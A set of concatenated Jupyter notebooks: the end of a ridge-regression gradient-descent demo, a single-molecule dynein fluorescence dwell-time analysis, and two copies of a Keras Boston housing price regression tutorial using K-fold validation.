print('Starting loss : ', loss(y_train, ridge_regression(X_train)))
print('Lowest possible training loss : {}\n'.format(loss(y_train, X_train @ w)))
# Collect history of loss function
losses = []
epochs = range(200)
for epoch in epochs:
current_loss = loss(y_train, ridge_regression(X_train))
losses.append(current_loss)
train(ridge_regression, X_train, y_train, learning_rate=0.0001)
if epoch < 10 or epoch > 190:
print('Epoch {}: loss={}'.format(epoch, current_loss))
# Let's plot it all
plt.figure(figsize=(13, 13))
plt.plot(epochs, losses, 'r')
plt.plot([loss(y_train, X_train @ w)] * len(epochs), 'b--')
plt.legend(['Loss function', 'Lowest possible training loss'])
plt.xlabel('Epochs')
plt.ylabel('$J(w)$ Cost Function')
plt.show()
###Output
Starting loss : tf.Tensor(37.454681051980394, shape=(), dtype=float64)
Lowest possible training loss : 3.4116052683219555
Epoch 0: loss=37.454681051980394
Epoch 1: loss=22.40175169292075
Epoch 2: loss=18.855612649130098
Epoch 3: loss=17.80754147512685
Epoch 4: loss=17.310296654471557
Epoch 5: loss=16.94257095883113
Epoch 6: loss=16.61282246189918
Epoch 7: loss=16.300794683242827
Epoch 8: loss=16.00166054325713
Epoch 9: loss=15.713951059960158
Epoch 191: loss=5.404992943589579
Epoch 192: loss=5.395234940282464
Epoch 193: loss=5.3855673835957205
Epoch 194: loss=5.375988996111795
Epoch 195: loss=5.366498524016606
Epoch 196: loss=5.357094736573996
Epoch 197: loss=5.347776425613824
Epoch 198: loss=5.3385424050333015
Epoch 199: loss=5.329391510311208
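###Markdown
As a follow-up sketch (not part of the original notebook), we can compare the gradient-descent estimate with the analytic pseudo-inverse solution on the held-out test digit defined earlier:
###Code
# Sketch: compare gradient-descent and analytic (pinv) predictions on the test sample.
print('Gradient-descent prediction :', ridge_regression(X_test).numpy().flatten())
print('Analytic (pinv) prediction  :', (X_test @ w).numpy().flatten())
print('Actual label                :', y_test.flatten())
###Output
_____no_output_____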
|
notebooks/.ipynb_checkpoints/02_exp_1067_ATP-checkpoint.ipynb | ###Markdown
Finite-Window data* Filament: Axoneme-488* Dynein: 1067-SNAP-Cy3 diluted by 1000* Condition: 2 mM ATP in DAB (50 mM K-Ac, 10 mM Mg-Ac2)* Number of frame: 500* Total time = 27.3 sCreated on Wed May 15 07:49:41 2019 @author: Jongmin Sung
###Code
# Import library
from __future__ import division, print_function, absolute_import
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
%matplotlib inline
from matplotlib import cm
import sys
sys.path.append("../finite_window/finite_window")
import config
#from my_funcs import generate_trace, find_dwell
data_dir = config.data_dir
data_files = config.data_files
###Output
_____no_output_____
###Markdown
Read a movie file (*.tif)
###Code
# Open a time lapse movie
filename = 'Slide1_Axoneme488_1067-Cy3 by 1000_2mM ATP_no interval_1_MMStack_Default.ome.tif'
movie = Image.open(filename)
n_frame = movie.n_frames
n_row = movie.size[1]
n_col = movie.size[0]
print('File name = ', filename)
print('[frame, row, col] = [%d, %d, %d] \n' %(n_frame, n_row, n_col))
# Pixel intensity is saved in I[frame, row, col]
I_frame = np.zeros((n_frame, n_row, n_col), dtype=int)
for i in range(n_frame):
movie.seek(i) # Move to i-th frame
I_frame[i,] = np.array(movie, dtype=int)
###Output
_____no_output_____
###Markdown
Create a maximum projection image
###Code
# Maximum projection
I_max = np.max(I_frame, axis=0)
fig, ax = plt.subplots(figsize=(10, 10))
ax.imshow(I_max, cmap=cm.gray)
ax.set_title('Maximum intensity')
###Output
_____no_output_____
###Markdown
Find local maximum intensity peaks
###Code
# Find peaks from local maximum
from skimage.feature import peak_local_max
spot_size = 3
min_distance = 5
peaks = peak_local_max(I_max, min_distance)
n_peak = len(peaks[:, 1])
row = peaks[::-1,0]
col = peaks[::-1,1]
print('Found', n_peak, 'spots. ')
fig, ax = plt.subplots(figsize=(10, 10))
ax.imshow(I_max, cmap=cm.gray)
for i in range(n_peak):
ax.plot(col[i], row[i], 'ro', ms=3, alpha=0.5)
ax.set_title('Peaks = %d, Spot size = %d, Min_distance = %d' % (n_peak, spot_size, min_distance))
###Output
Found 1917 spots.
###Markdown
Get the intensity traces at each spot
###Code
I_peak = ['None']*n_peak
s = int(spot_size/2)
for i in range(n_peak):
I_peak[i] = np.mean(np.mean(I_frame[:,row[i]-s:row[i]+s,col[i]-s:col[i]+s], axis=2), axis=1) # Mean intensity around the peak
fig, (ax1, ax2) = plt.subplots(1,2,figsize=(15,5))
ax1.hist([I_peak[i].max() for i in range(n_peak)], 100, color='k', histtype='step', lw=1)
ax1.set_xlabel('Intensity')
ax1.set_ylabel('Occurrence')
ax1.set_title('Maximum intensity at each spot')
ax2.hist([I_peak[i].min() for i in range(n_peak)], 100, color='k', histtype='step', lw=1)
ax1.set_xlabel('Intensity')
ax1.set_ylabel('Occurrence')
ax2.set_title('Minimum intensity at each spot')
###Output
_____no_output_____
###Markdown
Normalize intensity traces at each spot
###Code
def lowpass(I, n):
m = int(n/2)
x = np.convolve(I, np.ones((n,))/n, mode='valid')
x0 = np.array(x[:m])
x1 = np.array(x[-m:])
return np.concatenate((x0, x, x1))
def normalize(I):
# Lowpass filter
I_lp = lowpass(I, 3)
# Normalize by min and max
I_lp = I_lp - np.min(I_lp)
I_lp = I_lp/np.max(I_lp)
# Renormalize by median of upper and lower parts
I_up = np.median(I[I_lp > 0.5])
I_low = np.median(I[I_lp < 0.5])
I_norm = (I - I_low)/(I_up - I_low)
return I_norm
I_peak = [normalize(I_peak[i]) for i in range(n_peak)]
###Output
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:19: RuntimeWarning: divide by zero encountered in true_divide
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:19: RuntimeWarning: invalid value encountered in true_divide
###Markdown
Check the noise level at each spot
###Code
def reject_outliers(data, m = 3.):
d = np.abs(data - np.median(data))
mdev = np.median(d)
s = d/mdev if mdev else 0.
return data[s<m]
def find_noise(I):
noise = I - lowpass(I, 3)
noise = reject_outliers(noise)
return np.std(noise)
noise = np.array([find_noise(I_peak[i]) for i in range(n_peak)])
fig, ax = plt.subplots(figsize=(10, 5))
ax.hist(noise[noise<1], 100, color='k', histtype='step', lw=1)
ax.set_xlabel('Noise')
ax.set_ylabel('Occurrence')
###Output
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:8: RuntimeWarning: invalid value encountered in subtract
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:5: RuntimeWarning: invalid value encountered in less
"""
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:15: RuntimeWarning: invalid value encountered in less
from ipykernel import kernelapp as app
###Markdown
Discard spots with high noise level
###Code
noise_cutoff = 0.2
I_mol = [I_peak[i] for i in range(n_peak) if noise[i] < noise_cutoff]
n_mol = len(I_mol)
print('Found %d molecules. Discarded %d spots.' %(n_mol, (n_peak-n_mol)))
###Output
Found 521 molecules. Discarded 1396 spots.
###Markdown
Show traces as an example
###Code
n_fig = 4
fig, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_mol[i], 'k', lw=1)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Normalized intensity')
fig.tight_layout()
###Output
_____no_output_____
###Markdown
Lowpass filter (smothen) the signal
###Code
I_lp = [lowpass(I_mol[i], 3) for i in range(n_mol)]
fig, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_lp[i], 'b', lw=1)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Smoothened intensity')
fig.tight_layout()
###Output
_____no_output_____
###Markdown
Find the traces using piecewise constant (PWC) algorithm Ref: Generalized Methods and Solvers for Noise Removal from Piecewise Constant Signals (2010)
###Code
# Use Jump Penalty algorithm among PWC since it is less sensitive to noise.
from pwc_jumppenalty import pwc_jumppenalty
from pwc_cluster import pwc_cluster
I_fit = ['None']*n_mol
for i in range(n_mol):
I_fit[i] = pwc_jumppenalty(I_lp[i], square=True, gamma=1.0, display=False, maxiter=10, full=False)
# I_fit[i] = pwc_cluster(I_mol[i], K=2, soft=False, beta=0.1, biased=True, display=False, stoptol=1e-5, maxiter=20) # Likelihood mean-shift
# Plot the fitting result
f, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_lp[i], 'b', lw=1)
ax[i].plot(I_fit[i], 'r', lw=3)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Smoothened intensity')
ax[i].set_title('PWC fitting result')
f.tight_layout()
###Output
_____no_output_____
###Markdown
Define state [unbound, bound] = [0, 1] in each trace based on the PWC fitting result
###Code
# If I_fit > 0.5, then it is bound state. Otherwise, it is unbound state.
state = [I_fit[i] > 0.5 for i in range(n_mol)]
# Plot the fitting result
f, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_mol[i], 'k', lw=1)
ax[i].plot(state[i], 'r', lw=3)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Intensity')
ax[i].set_title('Bound/Unbound states')
f.tight_layout()
###Output
_____no_output_____
###Markdown
Now, we find the dwell time from each trace
###Code
# Variable to save bound and unbound dwell
dwell = [] # Dwell time
for i in range(n_mol):
t_b = [] # Frame number at binding
t_u = [] # Frame number at unbinding
s = state[i] # State of ith molecule
for j in range(len(s)-1):
# Frame at binding
if (s[j] == False) & (s[j+1] == True):
t_b.append(j)
        # Frame at unbinding
if (s[j] == True) & (s[j+1] == False):
t_u.append(j)
# Stop if there's no complete binding/unbinding
if len(t_b)*len(t_u) == 0:
continue
# Remove pre-existing binding
if t_u[0] < t_b[0]:
del t_u[0]
# Stop if there's no complete binding/unbinding
if len(t_b)*len(t_u) == 0:
continue
# Remove unfinished binding
if t_u[-1] < t_b[-1]:
del t_b[-1]
# Stop if there's no complete binding/unbinding
if len(t_b)*len(t_u) == 0:
continue
# Dwell time of each molecule
t_bu = [t_u[k] - t_b[k] for k in range(len(t_b))]
# Dwell time of overall molecules
dwell.extend(t_bu)
print('%d events are found.' %(len(dwell)))
###Output
857 events are found.
###Markdown
Histogram and mean dwell time
###Code
mean_dwell = np.mean(dwell)
bins = np.linspace(0, max(dwell), 20)
norm = len(dwell)*(bins[1]-bins[0])
t = np.linspace(min(dwell), max(dwell), 100)
exp_mean = np.exp(-t/mean_dwell)/mean_dwell
exp_mean = exp_mean*norm
fig, (ax1, ax2) = plt.subplots(1,2,figsize=(15,5))
ax1.hist(dwell, bins, color='k', histtype='step', lw=1)
ax1.plot(t, exp_mean, 'r')
ax1.set_xlabel('Frame')
ax1.set_ylabel('Occurrence')
ax1.set_title('Dwell time distribution (N = %d)' %(len(dwell)))
ax2.hist(dwell, bins, color='k', histtype='step', lw=1)
ax2.plot(t, exp_mean, 'r')
ax2.set_yscale('log')
ax2.set_xlabel('Frame')
ax2.set_ylabel('Occurrence')
ax2.set_title('Mean dwell time = %.1f [frame]' %(mean_dwell))
###Output
_____no_output_____
###Markdown
Finally, we got the mean dwell time of the entire molecules. Add drift correction Jupyter Github else?
###Code
import numpy
###Output
_____no_output_____ |
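###Markdown
As a quick follow-up sketch (not part of the original analysis): the acquisition above was 500 frames over 27.3 s in total, so the mean dwell time in frames can be converted to seconds and to an apparent unbinding rate. Note that this naive conversion ignores the finite-observation-window bias that this project addresses:
###Code
# Sketch: convert the mean dwell time from frames to seconds using the
# acquisition parameters stated in the header (n_frame frames in 27.3 s total).
total_time_s = 27.3            # total acquisition time [s], from the description above
dt = total_time_s / n_frame    # time per frame [s]
mean_dwell_s = mean_dwell * dt # mean dwell time [s]
k_off = 1.0 / mean_dwell_s     # apparent unbinding rate [1/s]
print('Frame time = %.4f s' % dt)
print('Mean dwell = %.2f s, apparent k_off = %.2f /s' % (mean_dwell_s, k_off))
###Output
_____no_output_____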
3.7-predicting-house-prices.ipynb | ###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance, some values are proportions, which take values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
print(type(train_data))
print(train_data.mean(axis=0))
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
train_data
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
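###Markdown
The same fold bookkeeping can also be delegated to scikit-learn. The following is a minimal sketch, not part of the original example; it assumes `train_data`, `train_targets`, and `build_model` from the cells above, and with the default `shuffle=False` the contiguous validation blocks are essentially the same as the manual slicing.
###Code
# Hedged sketch: the manual K-fold slicing above, expressed with scikit-learn's KFold.
from sklearn.model_selection import KFold
import numpy as np

kfold_scores = []
for train_idx, val_idx in KFold(n_splits=4).split(train_data):
    model = build_model()
    model.fit(train_data[train_idx], train_targets[train_idx],
              epochs=100, batch_size=1, verbose=0)
    _, val_mae = model.evaluate(train_data[val_idx], train_targets[val_idx], verbose=0)
    kfold_scores.append(val_mae)
np.mean(kfold_scores)
###Output
_____no_output_____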
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
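###Markdown
The hand-rolled `smooth_curve` above is just an exponential moving average, so if pandas is available the same smoothing can be written in one line. A minimal sketch (assuming `average_mae_history` from the cells above); `factor=0.9` corresponds to `alpha = 0.1`:
###Code
# Hedged sketch: the same exponential moving average via pandas
# (ewm with adjust=False reproduces smooth_curve with factor=0.9).
import pandas as pd

smoothed = pd.Series(average_mae_history[10:]).ewm(alpha=0.1, adjust=False).mean()
plt.plot(range(1, len(smoothed) + 1), smoothed)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE (smoothed)')
plt.show()
###Output
_____no_output_____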
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
len(train_data[1])
train_data[1]
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
from sklearn.preprocessing import StandardScaler
# Feature-wise standardization with scikit-learn: fit on the training data only,
# then reuse the training statistics for the test data (Normalizer would scale
# each sample row-wise, which is not what we want here).
scaler = StandardScaler()
train_sk = scaler.fit_transform(train_data)
test_sk = scaler.transform(test_data)
# The same standardization done by hand with NumPy:
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
train_data[1]
test_data[1]
# Both approaches give the same result:
test_sk[1] - test_data[1]
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Note that this is a simple step,also accomplished in a standardized way using StandardScaler from scikit-learn Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
    # Note: newer Keras versions record this metric under the key 'val_mae'
    # instead of 'val_mean_absolute_error' (check history.history.keys()).
    mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
